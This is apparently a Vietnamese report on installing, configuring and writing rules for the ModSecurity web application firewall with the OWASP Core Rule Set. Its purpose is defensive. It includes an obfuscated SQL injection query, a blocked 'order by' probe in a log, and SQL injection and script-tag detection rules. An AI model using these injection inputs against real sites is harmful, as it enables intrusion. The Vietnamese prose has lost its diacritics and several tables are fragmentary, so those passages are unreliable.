Professional Documents
Culture Documents
minhtamnw@gmail.com
MC LC
I.
CI T MODSECURITY...........................................................................................12
VII. CU HNH..................................................................................................................... 15
Cu hnh th mc................................................................................................................... 15
Cc tp tin cu hnh................................................................................................................ 15
Cc ch th trong tp tin cu hnh...........................................................................................16
Qun l Request Body...........................................................................................................17
Qun l Response Body.........................................................................................................18
Filesystem Locations.............................................................................................................. 18
File Uploads........................................................................................................................... 19
Debug Log............................................................................................................................. 19
Audit Log............................................................................................................................... 19
Default Rule Match Policy.....................................................................................................20
Verifying Installation.............................................................................................................. 20
VIII. OWASP MODSECURITY CORE RULE SET...............................................................20
2
Gii thiu............................................................................................................................... 20
Trin khai OWASP ModSecurity CRS...................................................................................21
Kim tra kt qu..................................................................................................................... 22
IX. TNG QUAN V RULE...................................................................................................23
Gii thiu............................................................................................................................... 23
Variables................................................................................................................................. 24
Request variables................................................................................................................ 25
Server variables..................................................................................................................26
Response variables.............................................................................................................. 26
Miscellaneouse variables....................................................................................................27
Parsing flags....................................................................................................................... 27
Collections variables...........................................................................................................28
Time variables....................................................................................................................28
Operators................................................................................................................................ 29
Stringmatching operators..................................................................................................29
Numerical operators............................................................................................................ 30
Validation operators............................................................................................................30
Miscellaneous operators.....................................................................................................30
Actions................................................................................................................................... 31
Disruptive actions...............................................................................................................31
Flow actions........................................................................................................................ 31
Metadata actions................................................................................................................. 32
Variable actions................................................................................................................... 32
Logging actions..................................................................................................................32
Special actions.................................................................................................................... 33
Miscellaneous Actions........................................................................................................33
X. RULE LANGUAGE TUTORIAL......................................................................................33
Tng quan.............................................................................................................................. 33
Hng dn s dng bin (variable)........................................................................................33
Hng dn s dng lin kt rule (chain)................................................................................34
Hng dn s dng ton t ph nh.....................................................................................34
Variable Counting..................................................................................................................35
3
Hng dn v action..............................................................................................................35
Action Defaults................................................................................................................... 35
Unconditional Rules...........................................................................................................36
Using Transformation Functions.........................................................................................36
Blocking............................................................................................................................. 37
Changing Rule Flow...........................................................................................................37
Capturing Data.................................................................................................................... 38
Variable Manipulation.........................................................................................................39
Metadata............................................................................................................................. 39
XI.
Trng hp 1: Chng tn cng Replay attack thng qua c ch nh token ngu nhin.......40
Trng hp 2: Pht hin cc Session cookie khng hp l....................................................43
Trng hp 3: Phng chng phng php khai thc HTTP Reponse Spliting.......................48
Trng hp 4: Phng chng phng php khai thc Path-Traversal......................................50
Trng hp 5: Pht hin nguy c l thng tin th tn dng....................................................52
Trng hp 6: Pht hin hnh vi ng nhp bruteforce.........................................................54
XII. PH LC........................................................................................................................ 61
DANH MC L HNG BO MT OWASP 2010.............................................................61
DANH MC CNG C H TR KIM TRA BO MT NG DNG WEB.................64
DANH MC THAM KHO KHAI THC L HNG BO MT NG DNG WEB.....67
XIII. TI LIU THAM KHO...............................................................................................91
I.
PHIU GIAO TI
Tn n:
Lu Thanh Tr
Mc ch
Cc firewall truyn thng khng mnh bo v cc web server. ModSecurity cho php
bo v web server (mt/nhiu) thng qua c ch can thip trc tip mc ng dng.
n ny nhm nghin cu v ng dng ModSecurity bo v h thng web bt k.
II.
II.
TS. Lu Thanh Tr
II.
NHP
Ngy nay, ng dng web trong doanh nghip v c quan chnh ph phi i mt vi hai
thch thc ln l: gim thiu nguy c bo mt v bo m quy trnh trong cng nghip v/hoc
nhng quy nh chnh ph. May mn thay khi tn ti mt gii php an ton thng tin sn sng
h tr cc t chc CNTT t c c hai tiu ch trn ti cng mt thi im. OWASP cho
php cc chuyn gia an ninh CNTT gim thiu c cc cuc tn cng bng cc ch ng v
lin tc cng c cc cu hnh cu hnh an ninh ca OS, ng dng web v Web Application
Firewall. ng thi, cc d n thuc chun OWASP cho php cc kim sot vin gim st vic
tun th cc chnh sch bt buc trong t chc, doanh nghip.
ModSecurity l mt sn phm thuc d n OWASP, cho php ngi dng cu hnh, ty
chnh cc phng thc pht hin tn cng vo web server. Phin bn ModSecurity hin ti
h tr Apache, Nginx v IIS. Cng vi d n ModSecurity Core Rule Set th vic trin khai h
thng WAF cng d dng hn cho nhn vin h thng cng nh cc chuyn vin bo mt.
III.
IV.
Mod_Security l mt module m rng cho cc chng trnh web server nh Apache, Nginx,
IIS v hot ng nh mt firewall ti lp ng dng web. Cng vi s gia tng v phng php
tn cng web th mod_security cng cp nht nhng rule v a ra nhiu cch phng chng
trong m ngun ca chng trnh. Mt s tnh cht m mod_security c th dng lm Web
Application Firewall:
Tnh linh ng (Flexibility)
Vic phn tch lung HTTP theo mt tiu ch nht nh trong thc t thng gp vn l
lm sao c th so trng mu m bn mun. Ngoi ra, do nhu cu ca tng h thng web l
khc nhau dn n vic phn tch trn tng loi ng dng cng khc nhau. Mod_security kt
hp vi OWASP pht trin cc tp rule mu (Core Rule Set) nhm to ra tnh linh ng cho
tng m hnh web khc nhau, h tr ngi qun tr phn tch theo nhu cu thc t ca h thng
ang qun tr.
Tnh th ng (Passivity)
ModSecurity s khng thc thi cc tc v nu nh ngi qun tr vin khng ch nh cng
vic c th cho chng trnh, vic ny l kh quan trng trong mt ng dng c nhim v phn
tch nguy c nh ModSecurity. Mi cnh bo s c thc hin thng qua c ch phn tch v
quyt nh tng tc vi h thng s do ngi qun tr thc hin.
CHC NNG
ModSecurity hot ng vi chng trnh web server (v d: Apache) s thc hin cc tc v
nh sau:
Parsing
ModSecurity s phn tch cc d liu lun chuyn qua h thng thnh cu trc d liu m
ModSecurity nh ngha sn. Cu trc ny s c chuyn qua c ch so trng mu trong tp
rule phn tch nguy c.
Buffering
Chc nng buffer (m) ng vai tr kh quan trng trong c ch hot ng ca ModSec.
Vic ny c ngha khi cc request gi n ng dng web th phi thng qua ModSecurity
trc khi n ng dng x l v nhng response cng s c phn tch trc khi tr v pha
client. C ch ny l cch duy nht c th ngn chn cc cuc tn cng thi gian thc, cc
d liu m ModSecurity nhn c v phn tch s c lu tr trong RAM (bao gm request
body v response data)
Logging
ModSecurity h tr ghi nht k cc gi tin HTTP: request headers, request body, response
header, response body nhm h tr ngi qun tr phn tch nguy c m h thng ang gp
phi c th ra quyt nh kim sot.
7
Rule Engine
Cc tp mu trong ModSecurity ng vai tr quan trng trong vic pht hin cc dng tn
cng v thc hin phng chng. ModSecurity cng pht trin vi d n OWASP pht trin cc
mu phn tch v phng chng cc tn cng h thng web (Tham kho
https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project)
Cc phn nhm m CRS h tr:
HTTP Protection
Real-time Blacklist Lookups
Web-based Malware Detection
HTTP Denial of Service Protections
Common Web Attacks Protection
Automation Detection
Integration with AV Scanning for File Uploads
Tracking Sensitive Data
Trojan Protection
Identification of Application Defects
Error Detection and Hiding
V.
A2-Cross Site
Scripting (XSS)
A3-Broken
Authentication and
Session Management
A4-Insecure Direct
Object References
A5-Cross Site
Request Forgery
(CSRF)
A6-Security
Misconfiguration
A7-Insecure
Cryptographic Storage
VI.
CI T MODSECURITY
Trc khi bn tin hnh ci t ModSecurity cho h thng, bn cn bit nhng phng thc
ci t cng nh mt s u im v khuyt im cho tng loi:
CCH CI T
Da vo phin bn ca
h iu hnh
U IM
T ng ci t
D dng bo tr
NHC IM
C th l phin bn c
Gi ci t ca bn th
T ng ci t
Ci t t m ngun
Bo m l phin bn mi
nht
C th s dng phin bn
th nghim
C th l phin bn c
Yu cu ti v cp nht
thng xuyn
Khng tin tng vo gi ci
t ng gi
C th gp cc vn khi
qun tr vin mun s
dng li phin bn c
trc
ba
12
C th ty bin, s dng cc
bn v khn cp trong tnh
hung pht hin li bo
mt
Trong phn ny, ti s hng dn bin dch t m ngun. ModSecurity c ti ti trang
web www.Modsecurity.org.
Trc khi ci t ModSecurity trn nn tng Linux, bn cn ci t mt s th vin h tr
nh sau: Apache Portable Runtime (APR), APR-util, bt module mod_unique_id trong Apache,
libcurl, libxml2, Lua 5.1 (ty chn), PCRE.
# yum install openssl openssl-devel pcre pcre-devel libxml2 libxml2-devel curl-devel pcre
pcre-devel
Ti phin bn ModSecurity mi nht ti trang chnh ca sn phm.
# wget http://www.Modsecurity.org/tarball/2.7.3/Modsecurity-apache_2.7.3.tar.gz
# wget http://www.Modsecurity.org/tarball/2.7.3/Modsecurity-apache_2.7.3.tar.gz.md5
Sau khi chnh tp tin httpd.conf, ta save li v tin hnh kim tra tp tin cu hnh, bo m
Apache hot ng bnh thng.
# httpd t
Khi ng li dch v httpd trn h thng, ng thi kim tra log file bo m dch v
hot ng tt.
# service httpd restart
#tail f /var/logs/httpd/error_log
14
VII.
CU HNH
Cu hnh th mc
Trc khi thc hin cu hnh ModSecurity, ti s to mt danh sch cc th mc theo mt
nh dng sn. Vic ny gip ti qun l d dng cc d liu m ModSecurity to ra, ng thi
h tr trong vic bo tr v cp nht cc rule mi cho ModSecurity.
Binaries: /opt/modsecurity/bin
Configuration files: /opt/modsecurity /etc
Audit logs: /opt/modsecurity /var/audit
Persistent data: /opt/modsecurity/var/data
Logs: /opt/modsecurity/var/log
Temporary files: /opt/modsecurity/var/tmp
File uploads: /opt/modsecurity/var/upload
Location
/opt/modsecurity
/opt/modsecurity/bin
/opt/modsecurity/etc
/opt/modsecurity/var
/
opt/modsecurity/var/audit
/opt/modsecurity/var/data
/opt/modsecurity/var/log
/opt/modsecurity/var/tmp
/
opt/modsecurity/var/upload
Owner
root
root
root
root
apache
Group
apache
apache
root
apache
root
Permissions
rwxr-x--rwxr-x--rwx-----rwxr-x--rwx------
apache
root
apache
apache
root
root
apache
root
rwx-----rwx-----rwxr-x--rwx------
Cc tp tin cu hnh
Tp tin
main.conf
rules-first.conf
M t
Tp tin cu hnh chnh
Tp lnh thc hin u tin
15
rules.conf
rules-last.conf
M t
Sets the application/x-www-form-urlencoded
parameter separator
Sets the cookie parser version
Sets the folder for persistent storage
Controls request body buffering
Sets the size of the per-request memory buffer
Sets the maximum request body size
ModSecurity will accept
Controls what happens once the request body
limit is reached
Sets the maximum request body size,
excluding uploaded files
Controls response body buffering
Specifies the response body buffering limit
Controls what happens once the response body
limit is reached
Specifies a list of response body MIME types
to inspect
Clears the list of response body MIME types
Controls the operation of the rule engine
Sets the folder for temporary files
#
SecDataDir /tmp/
File Uploads
Ti phn cu hnh qun l upload tp tin, ta cn ch nh th mc cha d liu tm thi trong
trng hp c tp tin c upload. Th mc ny s cha tp tin tm thi ModSecurity kim
tra trc khi a quan Apache x l ni dung tip theo.
Khuyn co: vic s dng chc nng theo di tp tin upload c th l nguyn nhn ca vic
lm tng dung lng lu tr do c nhiu tp tin trng lp ni dung, ng thi vic ny s lm
gim hiu sut ca ModSecurity. V l do ny, bn ch nn s dng chc nng ny khi tht s
cn thit.
# The location where ModSecurity will store intercepted
# uploaded files. This location must be private to ModSecurity.
SecUploadDir /opt/modsecurity/var/upload/
# By default, do not intercept (nor store) uploaded files.
SecUploadKeepFiles Off
Debug Log
Debug log s h tr qun ngi tr trong vic theo di hot ng ca ModSecurity. Log level
trong phn ny c khuyn co thit lp mc 3, nhm gii hn vic tng kch thc ca log
m vn bo m cho vic theo di h thng.
# Debug log
SecDebugLog /opt/modsecurity/var/log/debug.log
SecDebugLogLevel 3
Audit Log
Audit log c s dng vi mc ch ghi li cc phin (transaction) lm vic. Audit log c 3
mc khc nhau ch nh cch thc hot ng trong ModSecurity: SecAuditEngineare On
(ghi log tt c phin lm vic), Off (tt audit log) v RelevantOnly (ch ghi log da vo mu m
ngi dng ch nh).
# Thc hin ghi log cho cc yu cu c m li t 500-599 (li t pha server).
RelevantOnly
SecAuditLogRelevantStatus ^5
# Use a single file for logging.
SecAuditLogType Serial
SecAuditLog /opt/modsecurity/var/log/audit.log
# Specify the path for concurrent audit logging.
SecAuditLogStorageDir /opt/modsecurity/var/audit/
19
VIII.
Gii thiu
ModSecurity sau khi c ci t thnh cng cn c cu hnh cc tp rule c th
hot ng nh mt WAF. Tuy nhin, vic t vit v trin khai cc rule l kh phc tp v tn
thi gian ti u cc chc nng trong rule.
Nhm nghin cu Truswave SpiderLabs pht trin mt nhm cc tp lnh c tn l
OWASP ModSecurity CRS, bao gm cc ni dung gi tin ca kiu tn cng c bit n.
Mt tnh nng mnh m ca CRS l c th bo v nhng ng dng web ph bin cng nh
nhng ng dng web t pht trin ring bit.
Nhm mc ch bo v cc ng dng web ph bin, CRS phn loi ni dung cc rule da
trn cc phng php tn cng:
HTTP Protection: pht hin cc nguy c da trn giao thc HTTP nh Method (
GET HEAD POST ), phin bn HTTP ( 1.0, 1.1)
Real-time Blacklist Lookups: lc cc dy IP nguy him da vo mt bn th 3.
Web-based Malware Detection: xc nh cc m c trong ni dung trang web
bng cch s dng Google Safe Browsign API.
20
Lin kt
https://github.com/SpiderLabs/owasp-modsecurity-crs
https://github.com/SpiderLabs/owasp-modsecurity-crs/tarball/master
https://github.com/SpiderLabs/owasp-modsecurity-crs/zipball/master
22
Hnh 5:Tn cng SQLI sau khi trin khai OWASP CRS
Cnh bo ghi nhn tn cng:
[Tue Jun 04 18:40:39 2013] [error] [client 192.168.149.1] ModSecurity: Access denied
with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]
{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b
?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?
i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:p. [file
"/opt/modsecurity/etc/crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"]
[line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data:
order by found within ARGS:p: 1 order by 1,2,4"] [severity "CRITICAL"] [ver
"OWASP_CRS/2.2.7"] [maturity "9"] [accuracy "8"] [tag
"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag
"OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname
"www.modsec.com"] [uri "/"] [unique_id "Ua3SN38AAAEAAAcbBfsAAAAA"]
IX.
Gii thiu
Modsecurity nh ngha 9 loi ch th ngi dng c th trin khai cc tnh nng lc linh
ng cho h thng web.
Directive
SecAction
SecDefaultAction
SecMarker
Description
Performs an unconditional action. This directive is
essentially a rule that always matches.
Specifies the default action list, which will be used in
the rules that follow.
Creates a marker that can be used in conjunction with
the skipAfteraction. A marker creates a rule that does
nothing, but has an ID assigned to it.
23
SecRule
SecRuleInheritance
Creates a rule.
Controls whether rules are inherited in a child
configuration context.
SecRuleRemoveById
Removes the rule with the given ID.
SecRuleRemoveByMsg
Removes the rule whose message matches the given
regular expression.
SecRuleScript
Creates a rule implemented using Lua.
SecRuleUpdateActionByI
Updates the action list of the rule with the given ID.
d
SecRuleUpdateTargetByI
Updates the target list of the rule with the given ID.
d
C php rule trong ModSecurity:
SecRule VARIABLES OPERATOR [TRANSFORMATION_FUNCTIONS, ACTIONS]
Trong mt rule ModSecurity c 4 thnh phn, trong hai thnh phn cui ca c php l
ty chn. Nu trong mt rule m bn nh ngha khng s dng 2 thnh phn
TRANSFORMATION_FUNCTIONS v ACTIONS th ModSecurity s dng cc gi tr mc
nh c thit lp trong SecDefaultAction.
Bin (Variables)
Trong ModSecurity, bin c s dng cho vic trch xut (etract) cc thnh phn khc nhau
ca gi tin HTTP. c Bn cn ch rng cc d liu tng tc trong qu trnh hot ng ca
ModSecurity l d liu th (raw bytes of data) bao gm cc k t c bit. Mc d ng dng
web m bn xy dng ch tng tc vi cc d liu dng vn bn (text), nhng bn khng th
chc chn c chuyn g ang xy ra nu nh cc i th s dng nhng cch vt qua cc
kim sot logic.
Trong phin bn hin ti, ModSecurity h tr 77 loi bin khc nhau tng tnh linh
ng chng li cc kiu khai thc nng cao.
Operators
Ti mc ny, ModSecurity s xc nh cc thc m mt bin c x l. Cc regular
expresstion c s dng ph bin, tuy nhin ModSecurity nh ngha sn cc operator nhm
h tr bn c th t xy dng mt rule cho mc ch c nhn.
Transformation_functions
Chc nng ny cho php chuyn i d liu u vo trc khi a qua c ch kim tra
(chuyn ch hoa thnh ch thng, decode base64 )
Actions
Ch r hnh ng s thc hin khi mt rule c so trng mu.
24
Variables
C 77 loi bin trong phin bn ModSecurity hin ti v chng c phn loi nh sau:
Scalar variables: Cha mt phn thng tin d liu, c th l chui hoc s. V d,
REMOTE_ADDR lun cha a ch IP ca ngi dng,
Collections: Nhm cc bin li vi nhau thnh mt nhm.
Read-only collections: Nhm cc bin khng th thay i trong qu trnh thc hin tng
tc gia ModSecurity v Apache.
Read/write collections: Nhm ny c s dng trong trng hp bn cn trin khai cc
rule c s thay i trong d liu u vo.
Special collections: Nhm cc bin c bit c dng trong vic trch xut d liu u vo
di dng XML.
Persistent collections: Khi cc rule s dng cc thnh phn trong nhm ny, th d liu s
c lu tr trong c s d liu ni b ca ModSecurity. Trong cc tc v nh theo di IP,
phin lm vic hoc theo di ngi dng ng nhp th vic lu tr s c s dng.
Request variables
Cc bin trong phn nhm ny chu trch nhim trch xut cc gi tr trong HTTP request
header a vo phn phn tch. Cc trng gi tr ModSecurity h tr trong cc bin c
thu thp t cc URI, method (GET HEAD POST PUT ), protocol information ( HTTP 1.1,
HTTP 1.0).
Bng sau lit k cc gi tr bin (Request variable) m ModSecurity h tr:
Variable
ARGS
ARGS_COMBINED_SIZE
ARGS_NAMES
ARGS_GET
ARGS_GET_NAMES
ARGS_POST
ARGS_POST_NAMES
FILES
FILES_COMBINED_SIZE
FILES_NAMES
FILES_SIZES
FILES_TMPNAMES
PATH_INFO
QUERY_STRING
Description
Request parameters (read-only collection)
Total size of all request parameters combined
Request parameters names (collection)
Query string parameters (read-only collection)
Query string parameters names (read-only
collection)
Request body parameters (read-only collection)
Request body parameters names (read-only
collection)
File names (read-only collection)
Combined size of all uploaded files
File parameter names (read-only collection)
A list of file sizes (read-only collection)
A list of temporary file names (read-only
collection)
Extra path information
Request query string
25
REMOTE_USER
REQUEST_BASENAME
REQUEST_BODY
REQUEST_COOKIES
REQUEST_COOKIES_NAM
ES
REQUEST_FILENAME
REQUEST_HEADERS
REQUEST_HEADERS_NAM
ES
REQUEST_LINE
REQUEST_METHOD
REQUEST_PROTOCOL
REQUEST_URI
REQUEST_URI_RAW
Remote user
Request URI basename
Request body
Request cookies (read-only collection)
Request cookies names (read-only collection)
Request URI file name/path
Request headers (collection, read-only)
Request headers names (read-only collection)
Request line
Request method
Request protocol
Request URI, convert to exclude hostname
Request URI, as it was presented in the request
Server variables
Cc bin trong phn nhm ny dng phn tch cc thnh phn do ngi dng gi n my
ch, v mt s khc lin quan n d liu tr v ngi dng.
Bng sau lit k cc gi tr bin (server variable) m ModSecurity h tr:
Variable
AUTH_TYPE
REMOTE_ADDR
REMOTE_HOST
REMOTE_PORT
SCRIPT_BASENAME
SCRIPT_FILENAME
SCRIPT_GID
SCRIPT_GROUPNAM
Description
Authentication type
Remote address
Remote host
Remote port
Script basename
Script file name/path
Script group ID
Script group name
SCRIPT_MODE
SCRIPT_UID
SCRIPT_USERNAME
SERVER_ADDR
SERVER_NAME
SERVER_PORT
Script permissions
Script user ID
Script user name
Server address
Server name
Server port
Response variables
Cc bin trong phn nhm ny c dng cho vic xc nh cc d liu tr v ngi dng.
Phn ln cc gi tr ny c s dng trong pha th 3 Response headers (3). Mt s thnh
phn lin quan n ni dung gi tin HTTP (body) th s c dng trong pha th 4 Response
body (4).
26
Description
Highest severity encountered
Contents of the last variable that matched
Contents of all variables that matched int the most
recent rule
Names of all variables that matched in the most
recent rule
Name of the last variable that matched
ModSecurity build version (e.g., 02050102)
Session ID associated with current transaction
Unique transaction ID generated by
mod_unique_id
User ID associated with current transaction
Web application ID associated with current
transaction
Error messages generated by Apache during
current transaction
Parsing flags
Variable
MULTIPART_BOUNDARY_QUOTED
MULTIPART_BOUNDARY_WHITESPAC
E
MULTIPART_CRLF_LF_LINES
27
Description
Multipart parsing error: quoted
boundary encountered
Multipart parsing error:
whitespace in boundary
Multipart parsing error: mixed line
endings used
MULTIPART_DATA_BEFORE
Multipart parsing error: seen data
before first boundary
MULTIPART_DATA_AFTER
Multipart parsing error: seen data
after last boundary
MULTIPART_FILE_LIMIT_EXCEEDED
Multipart parsing error: too many
files
MULTIPART_HEADER_FOLDING
Multipart parsing error: header
folding used
MULTIPART_INVALID_HEADER_FOLDI
Multipart parsing error: invalid
NG
header folding encountered
MULTIPART_LF_LINE
Multipart parsing error: LFline
ending detected
MULTIPART_MISSING_SEMICOLON
Multipart parsing error: missing
semicolon before boundary
MULTIPART_STRICT_ERROR
At least one multipart error except
unmatched boundary occurred
MULTIPART_UNMATCHED_BOUNDAR
Multipart parsing error:
Y
unmatched boundary detected
REQBODY_PROCESSOR
Request processor that handled
request body
REQBODY_PROCESSOR_ERROR
Request processor error flag (0 or
1)
REQBODY_PROCESSOR_ERROR_MSG
Request processor error message
Collections variables
Cc bin trong nhm ny c th cha bin ca cc nhm khc, nhm phc v vic thu thp
d liu a qua c ch phn tch hnh vi trong ModSecurity.
Variable
ENV
GEO
GLOBAL
IP
TX
RULE
SESSION
USER
XML
Description
Environment variables (read-only collection,
although its possible to use setvar
to change it)
Geo lookup information from the last
@geoLookupinvocation (read-only collec
tion)
Global information, shared by all processes
(read/write collection)
IP address data storage (read/write collection)
Transient transaction data (read/write
collection)
Current rule metadata (read-only collection)
Session data storage (read/write collection)
28
Time variables
Cc bin v thi gian dng xc nh thi gian khi mt phin lm vic trn ModSecurity
c thc hin.
Variable
TIME
TIME_DAY
TIME_EPOCH
TIME_HOUR
TIME_MIN
TIME_MON
TIME_SEC
TIME_WDAY
TIME_YEAR
Description
Time (HH:MM:SS)
Day of the month (131)
Seconds since January 1, 1970 (e.g.,
1251029017)
Hour of the day (023)
Minute of the hour (059)
Month of the year (011)
Second of the minute (059)
Week day (06)
Year
Operators
Cc ton t kim tra trong ModSecurity c nhim v phn tch cc bin u vo Variables
ra quyt nh. Hu ht cc rule s s dng cc regular expression cho vic phn tch, nhng
trong mt s trng hp c th th cc phn nhm ton t khc s hu ch hn.
Ta xt trng hp cn so snh cc gi tr l s (numberic) th vic s dng Regular
expression l kh bt li cho vic to rule v ti nguyn khi thc thi so snh rule. ModSecurity
h tr mt nhm phng thc so snh khc nhau nhm tng hiu nng cho phn kim tra.
Trong trng hp ny th vic s dng cc ton t v s hc s hiu qu hn nhiu so vi
regular expression.
ModSecurity h tr 4 nhm:
Stringmatching operators
Numerical operators
Validation operators
Miscellaneous operators
Stringmatching operators
Cc ton t so trng chui c dng phn tch cc u d liu vo t cc bin. Ton t @rx
v @pm thng c s dng nhiu trong cc rule phn tch, bi v tnh linh ng ca @rx v
tc x l ca @pm. Trong mt s trng hp khc th cc ton t cn li s h tr bn pht
trin cc rule ty theo mc ch chi tit.
Operator
@beginsWith
@contains
Description
Input begins with parameter
Input contains parameter
29
@endsWith
@rsub
@rx
@pm
@pmFromFile(also @pmfas of
2.6)
@streq
@within
Numerical operators
Trong bng di lit k cc ton t h tr so snh cc gi tr s. Trong phin bn
ModSecurity trc 2.5.12 th vic so snh cc gi tr s hc phi thng qua regular expression,
vic ny lm nh hng ln n hiu nng hot ng ca server.
Operator
@eq
@ge
@gt
@le
@lt
Description
Equal
Greater or equal
Greater than
Less or equal
Less than
Validation operators
Cc ton t kim tra m ModSecurity h tr c lit k trong bng sau:
Operator
@validateByteRange
@validateDTD
@validateSchema
@validateUrlEncoding
@validateUtf8Encoding
Description
Validates that parameter consists only of
allowed byte values
Validates XML payload against a DTD
Validates XML payload against a schema
Validates an URL-encoded string
Validates an UTF-8-encoded string
Miscellaneous operators
V phn nhm operator cui cng m ModSecurity h tr cho php bn to ra mt s rule
vi cc chc nng lc kh hu dng nh: pht hin l thng tin credit card (@verifyCC), kim
tra vng a l ca IP ngi dng (@geoLookup), kim tra l thng tin s an sinh x hi
(@verifySSN )
Operator
@geoLookup
@inspectFile
@rbl
Description
Determines the physical location of an IP
address
nvokes an external script to inspect a file
Looks up the parameter against a RBL (realtime block list)
30
@verifyCC
@verifyCPF
@verifySSN
@ipMatch
@ipMatchFromFile( and @ip
MatchF), as of 2.7.0
Actions
Cc hnh vi (action) l im mnh ca ModSecurity cho php h thng web c kh nng
min dch vi mt s loi khai thc bit n. Cc action l thnh phn cui cng trong mt
rule, Apache s quyt nh kt qu tr v pha ngi dng (thng bo li, hy kt ni hoc cho
php truy cp)
ModSecurity chia cc action thnh 7 phn mc:
Disruptive actions
Flow actions
Metadata actions
Variable actions
Logging actions
Special actions
Miscellaneous Actions
Disruptive actions
Trong phn nhm ny, cc action c s dng nhm mc ch ngn chn hoc chuyn
hng kt ni trong trng hp ModSecurity pht hin mu tn cng trng khp.
Action
allow
block
deny
drop
pass
pause
proxy
redirect
Description
Stop processing of one or more remaining
phases
Indicate that a rule wants to block
Block transaction with an error page
Close network connection
Do not block, go to the next rule
Pause for a period of time, then execute allow.
Proxy request to a backend web server
Redirect request to some other web server
31
Flow actions
Action
chain
skip
skipAfter
Description
Connect two or more rules into a single logical
rule
Skip over one or more rules that follow
Skip after the rule or marker with the provided
ID
Metadata actions
Phn nhm ny cho php bn nh ngha cc thng tin m t v rule. Cc thng tin ny
thng c dng m t thng bo li (error message), gii thch nguyn nhn xut hin li
hoc cch khc phc ngh.
Action
id
phase
msg
rev
severity
tag
Description
Assign unique ID to a rule
Phase for a rule to run in
Message string
Revision number
Severity
Tag
Variable actions
Cch hnh vi trong nhm ny c lin h vi cc gi tr bin (Variables), cc action ny
cho php gn gi tr (set), thay i (change) v xa (remove) gi tr m cc bin lu tr.
Action
capture
deprecatevar
expirevar
initcol
setenv
setvar
setuid
setsid
Description
Capture results into one or more variables
Decrease numerical variable value over time
Remove variable after a time period
Create a new persistent collection
Set or remove an environment variable
Set, remove, increment, or decrement a variable
Associate current transaction with an
application user ID (username)
Associate current transaction with an
application session ID
Logging actions
Cc action trong phn nhm ghi log ch dn ModSecurity phng thc v ni lu tr log.
Cc action nh hng n vic ghi log trong rule l auditlog, log, noauditlog v nolog. iu
khin qu trnh ghi log, bn cn tham kho ctlaction.
Action
auditlog
log
Description
Log current transaction to audit log
Log error message; implies auditlog
32
logdata
noauditlog
nolog
sanitiseArg
sanitiseMatched
sanitiseRequestHeader
Special actions
Action
ctl
multiMatch
t
Miscellaneous Actions
Action
append
exec
prepend
status
xmlns
X.
Description
Change configuration of current transaction
Activate multi-matching, where an operator
runs after every transformation
Specify transformation functions to apply to
variables before matching
Description
Append content to response body
Execute external script
Prepend content to response body
Specify response status code to use with
denyand redirect
Specify name space for use with XPath
expressions
Tng quan
Trong phn hng dn ny, ti s bt u vi mt rule n gin gm mt bin v mt chui
(string) nh sau:
SecRule REQUEST_URI <script>
Vi biu thc so snh nh trn th ModSecurity thc thi kim tra d liu trong URI t pha
ngi dng v xc nh c s tn ti ca chui <script> hay khng. Tuy nhin, bn c th s
dng thm mt operator vo rule trn tng hiu qu kim tra trong ModSecurity, ti s vit
li rule trn nh sau:
SecRule REQUEST_URI "@rx <script>"
ModSecurity h tr nhiu loi operator khc nhau. Mt s c cng chc nng, nhng cc
operator s c nh hng khc nhau n hiu sut ca h thng. Trong v d ti a ra th chui
<script> khng phi l mt biu thc so snh, bi v chng khng cha k t c bit xc
33
SecRule ARGS K1
Khi ModSecurity hot ng, th rule trn s c hiu nh sau:
SecRule ARGS K1 phase:2,log,auditlog,pass
Bng cch ny, ModSecurity gip bn trin khai mt rule d dng hn m khng cn phi
ch nh mt action lp li nhiu ln:
SecDefaultAction phase:2,log,deny,status:404
SecRule ARGS K1
SecRule ARGS K2
...
SecRule ARGS K99
Unconditional Rules
Hnh vi m bn thit lp trong ch th SecRule s c thc hin khi c mu trng khp vi
cc biu thc, nhng bn cng c th s dng ch th SecAction trin khai cc hnh vi
(action) m bn nh ngha sn. Ch th SecAction cho php cha duy nht mt tham s
(parameter), tham s ny c dng lin kt vi thnh phn th ba trong ch th SecRule.
SecAction nolog,pass,setvar:tx.counter=10
Using Transformation Functions
Trong cc phng php khai thc l hng ng dng web, hacker thng s dng cc k
thut bin i d liu (obfuscation) vt qua c ch kim tra. chng li phng php
bin i, ModSecurity h tr chuyn i d liu u vo trc khi thc hin kim tra cc tn
cng. V d:
Trong tn cng SQL Injection th hacker thc hin cu truy vn: id=1&UniON
%20SeLeCT%201,2,3,4,5,6 (trong trng hp ny ta cn chuyn i cc k t sang ch
thng (lowercase) trc khi kim tra)
Hoc trong rule bn di, ModSecurity s thc hin chuyn cc k t thnh ch thng,
ng thi loi b cc k t khong trng khng cn thit:
SecRule ARGS "@contains delete from" \
phase:2,t:lowercase,t:compressWhitespace,block
Kt qu m ModSecurity s thc hin l lc nhng t kha c dng:
delete from
DELETE FROM
deLeTe fRoM
36
Delete From
DELETE\tFROM
Mt s l do bn cn s dng chc nng chuyn i:
Vi cc khai thc s dng phng php encode base64, ta c th p dng
t:base64Decode decode d liu u vo.
Tng t Base64, vi trng hp hacker chuyn i kiu d liu thnh dng Hex
th t:hexEncode nn c s dng chuyn i sang dng Plaintext.
Blocking
Cc ch th s dng trong ModSecurity c lin kt duy nht vi mt action (hoc ch th
SecAction) x l kt qu phn tch trc . C ba trng thi m ModSecurity h tr
trong vic ngn chn tn cng:
"phase:1,auditlog,id:10000,nolog,pass,capture,setsid:%{TX.1}"
[4] Transformation completed in 7 usec.
[4] Executing operator "rx" with param "^/([0-9a-fA-f]{16})/" against REQUEST_URI.
[9] Target value: "/69d032331009e7b0/index.html"
[9] Added regex subexpression to TX.0: /69d032331009e7b0/
